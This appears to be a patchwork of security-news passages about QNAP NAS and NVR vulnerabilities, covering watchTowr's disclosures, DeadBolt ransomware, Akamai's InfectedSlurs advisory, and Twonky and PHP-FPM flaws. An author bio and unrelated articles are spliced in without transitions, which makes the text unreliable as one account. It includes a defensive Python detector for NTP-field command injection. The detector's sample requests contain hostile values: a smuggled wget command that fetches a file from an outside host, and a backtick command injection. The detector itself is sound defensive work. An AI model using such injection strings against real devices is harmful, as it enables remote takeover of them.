Six of the remaining 11 bugs were accepted and validated by QNAP, and all have CVEs assigned to them, but despite most being reported in early January, and one as far back as December 2023, the vendor still hasn't released patches.
It's standard practice to allow a vendor 90 days to fix and disclose a vulnerability reported to it by a researcher. This window allows time to assess the threat, develop a fix, devise a strategy for rolling out patches, and decide when and how to disclose it publicly.
Especially generous researchers, or those reporting particularly confounding bugs that aren't so easily fixed, will sometimes extend this 90-day window to ensure the vulnerability is patched properly, even if it means letting it go unfixed for a longer period.
According to watchTowr, the majority of the bugs it outlined were reported to QNAP in January, meaning that by going public on May 17 the researchers gave the vendor a considerably larger window in which to issue patches.
"Here at watchTowr, we abide by an industry-standard 90-day period for vendors to respond to issues, as specified in our VDP," said watchTowr. "We are usually generous in granting extensions to this in unusual circumstances, and indeed, QNAP has received multiple extensions in order to allow remediation."
Despite the apparent inability of the vendor to issue patches on time, the researchers said QNAP was highly cooperative throughout the disclosure process. The vendor offered watchTowr's team remote access to its testing environment to allow for more comprehensive vulnerability reporting.
QNAP's security practices have been called into question numerous times in recent years. The highest profile cases have arguably involved ransomware, with various strains taking shots at the vendor's devices over the years.
The following year saw another ransomware event at the hands of DeadBolt. The criminals behind the operation launched at least four different waves of ransomware attacks against QNAP NAS devices, updating code along the way for stronger and faster encryption.
The situation became so bad that the vendor took the controversial measure of force-updating devices that users hadn't patched. Many NAS owners at the time didn't respond positively, since the updates could have led to important data loss.
As recently as February QNAP was also accused of bungling the severity assessment of a vulnerability that both researchers and national security agencies agreed required urgent patching. QNAP assigned CVE-2023-50358 a mere 5.8 severity rating out of a possible 10.
Researchers at watchTowr were especially keen to highlight CVE-2024-27130, a stack overflow vulnerability requiring no authentication that can lead to remote code execution (RCE), provided that a valid NAS user has shared a malicious file.
It's generally considered bad practice for anyone to release proof of concept (PoC) exploit code for vulnerabilities that haven't been patched, but watchTowr has done so via GitHub, perhaps to hurry QNAP along.
The researchers said they empathize with QNAP, which manages a codebase heavily composed of ten-year-old code, and how the vendor is "working hard to squeeze all the bugs out of it." However, given its prior history of suffering damaging attacks, patches should probably be developed at a faster rate.
Larry W. Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.
The Akamai Security Intelligence Response Team (SIRT) has issued an additional update to the InfectedSlurs advisory series now that one of the affected vendors has released advisory information and guidance.
We provided an extensive list of indicators of compromise (IOCs), Snort rules, and YARA rules in the original research to help identify these exploit attempts in the wild and possible active infections on defender networks.
As part of our InfectedSlurs research, the SIRT uncovered a vulnerability in QNAP VioStor network video recorder (NVR) devices that is being actively exploited in the wild. The NVR device is a high-performance network surveillance solution for network-based monitoring of IP cameras, video recording, playback, and remote data access. The vulnerability has been given the CVE ID of CVE-2023-47565 with a CVSS v3 score of 8.0.
The vulnerability allows an authenticated attacker to achieve OS command injection with a payload delivered via a POST request to the management interface. In the captured payloads, the exploit authenticates using the device's default credentials.
QNAP considers these devices discontinued for support; however, the vendor recommends upgrading VioStor firmware on existing devices to the latest available version. This issue had previously been patched, although it was never publicly reported/disclosed. Furthermore, users should change the default passwords on their devices.
Initially, when we reviewed exploit payloads during the InfectedSlurs campaign, we reported only on two zero-day vulnerabilities as the team was unable to positively link the observed exploit to a given device or manufacturer. This made it difficult to confirm the zero-day classification of the exploit.
After deeper examination of various aspects of the exploit and payload, the SIRT concluded that the target was QNAP VioStor NVR devices. These devices fit the targeting profile of the campaign and were shipped with weak default credentials (found in their manuals and observed in the exploit). As with the initial two zero-days, the vulnerability is an OS command injection in the NTP settings of the affected Internet of Things (IoT) and NVR devices.
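The following is an added example, not part of the Akamai advisory, showing how a defender might screen management-interface POST bodies for the kind of abuse described above: shell metacharacters smuggled into an NTP server field. The CGI path, parameter names and request samples are constructed placeholders; the real InfectedSlurs payloads are not reproduced.

```python
import re
from urllib.parse import parse_qs

# Constructed sample of POST bodies to an NVR/NAS management interface.
# Path and field names are hypothetical; only the shape of the abuse matters.
SAMPLE_REQUESTS = [
    {"path": "/cgi-bin/sys_settings.cgi", "user": "admin",
     "body": "ntp_server=pool.ntp.org&timezone=UTC"},
    {"path": "/cgi-bin/sys_settings.cgi", "user": "admin",
     "body": "ntp_server=pool.ntp.org;wget%20http://203.0.113.5/x%20-O%20/tmp/x&timezone=UTC"},
    {"path": "/cgi-bin/sys_settings.cgi", "user": "admin",
     "body": "ntp_server=%60id%60&timezone=UTC"},
    {"path": "/cgi-bin/login.cgi", "user": "operator",
     "body": "user=operator&pwd=x"},
]

# Shell metacharacters that have no legitimate place in a hostname or IP literal.
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")
# RFC 1123 hostname (also matches a dotted-quad IPv4 address).
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$"
)
# Form fields that firmware typically hands to an NTP client command line.
NTP_FIELDS = ("ntp_server", "ntp_server2")


def validate_ntp_server(value):
    """Allow-list check a patched firmware should apply before using the value."""
    return bool(HOSTNAME.match(value)) and not SHELL_META.search(value)


def classify_request(req):
    """Return a list of findings for one decoded management-interface request."""
    findings = []
    # parse_qs percent-decodes values, so %60 (backtick) and %3B (;) are caught.
    params = parse_qs(req["body"], keep_blank_values=True)
    for field in NTP_FIELDS:
        for value in params.get(field, []):
            if SHELL_META.search(value):
                findings.append(f"shell metacharacter in {field}")
            elif not HOSTNAME.match(value):
                findings.append(f"malformed hostname in {field}")
    return findings


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req["path"], req["user"], classify_request(req) or "clean")
```

The same allow-list in `validate_ntp_server` is what the device side should enforce: reject anything that is not a hostname or address before the value reaches a shell.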
Once again, our custom honeypot network deployment has provided valuable insights into cyberattacks, revealing previously unknown vulnerabilities. The presence of default credentials and outdated, unsupported networked systems has emerged as a route for botnet infections. Legacy systems are fertile ground for new vulnerabilities to be discovered and exploited in order to propagate malware.
This finding emphasizes the critical importance of enhancing awareness and education on best practices for IoT, highlighting associated risks for the average consumer; the need for awareness extends beyond consumers and applies to manufacturers of these devices as well. Longer software support cycles and security upon setup, such as forced password changes, are critical to maintaining system security.
QNAP patched three vulnerabilities in its network-attached storage (NAS) products: one with a critical CVSS score of 9.8 and two of medium severity, both with CVSS scores well under 5.0.
The vendor recommended that security teams running QNAP NAS devices should regularly update their systems and applications to the latest version to benefit from the vulnerability fixes. The company made no mention as to whether these bugs were actively exploited in the wild. QNAP made a similar set of patches to QNAP NAS devices in January.
Roughly a month ago, QNAP patched 24 vulnerabilities across its product range, including two high-severity flaws that could enable command execution, and in late January, QNAP patched a dangerous flaw affecting QTS 5.0.1 and QuTS hero h.5.0.1.
The flaws, which were among a raft of serious bugs addressed by the Taiwanese hardware vendor last week, can both lead to remote code execution (RCE), according to a blog post published on March 31 by security researcher Yaniv Puyeski of SAM Seamless Network.
Another QNAP advisory indicates that a QNAP NAS package is still pending for v8.5.2 of third-party application Twonky Server after its vendor, Lynx Technology, patched a pair of high severity bugs in the media server that can be combined to damaging effect.
Found by Sven Krewitt of Risk Based Security and disclosed on March 16, the flaws include an improper access restriction vulnerability that can expose the administrator username and password, and a weak password obfuscation flaw facilitating password decryption.
The problem appears to be in the part of PHP that deals with FPM and isn't a new vulnerability. It's been known about in theory for three years, but only now has it been shown to be exploitable. FPM is a FastCGI Process Manager that a webserver passes requests to and which can spawn and kill PHP processes as needed. If set up in a particular way, this FPM can be manipulated into writing data past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.
Note that this is totally different from QNAP's recent unfortunate experience with Deadbolt ransomware. The reason why QNAP, out of all the NAS vendors, appears to have so many problems is that it's both very popular and takes a conscientious approach to issuing security advisories and deploying patches. Given that the vulnerability hasn't been patched for all QNAP operating systems yet, it has been assigned the status 'Fixing.'
In the meantime, QNAP recommends users update to the latest firmware for their storage box. This can be done in the system control panel, using the Live Update panel, or by downloading an update file directly from the QNAP website.